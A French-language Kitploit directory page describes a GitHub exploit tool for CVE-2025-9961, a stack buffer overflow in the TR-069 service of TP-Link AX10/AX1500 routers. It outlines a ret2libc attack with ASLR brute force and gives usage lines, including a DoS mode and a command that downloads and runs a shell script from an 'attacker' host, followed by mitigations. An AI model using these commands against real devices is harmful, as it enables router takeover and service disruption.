Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9961 | Kitploit
Outils/GitHubGitHub/yt2w/cve-2025-9961
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité MatérielleOutil d'Accès à DistanceExploitation de Binaires
GitHubyt2w/cve-2025-9961

CVE-2025-9961

Voir le dépôt
61il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-9961

Débordement de tampon de pile CWMP sur TP-Link AX10/AX1500 — RCE

Vue d'ensemble

Débordement de tampon de pile dans CWMP (TR-069) permettant l'exécution de code à distance.

ChampValeur
ProduitTP-Link AX10, AX1500
Versions concernéesAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8,6 (Élevé)
TypeDébordement de tampon de pile
VecteurCWMP/TR-069 (port 7547)
ImpactExécution de code à distance

Déroulement de l'attaque

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

Détails techniques

La vulnérabilité se trouve dans le traitement par le processus cwmp des requêtes SOAP SetParameterValues. L'entrée est utilisée pour calculer la taille du tampon sans vérification des limites.

Exploitation :

  • Utiliser ret2libc pour appeler system()
  • Contournement de l'ASLR par force brute
  • Le redémarrage du service permet de tenter l'exploitation à plusieurs reprises

Utilisation

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

Paramètres

Prérequis

Aucun (utilise la bibliothèque standard)

Atténuation

  • Mettre à jour vers le firmware corrigé
  • Désactiver TR-069/CWMP
  • Restreindre l'accès au port 7547

Avertissement

Pour tests de sécurité autorisés uniquement.

Télécharger l’outil
OptionDescriptionDéfaut
-p, --portPort CWMP7547
-c, --commandCommande pour la RCEaucun
-t, --timeoutDélai d'expiration de la socket10
--dosMode DoS uniquementdésactivé
--check-onlyVérifier si la cible est vulnérabledésactivé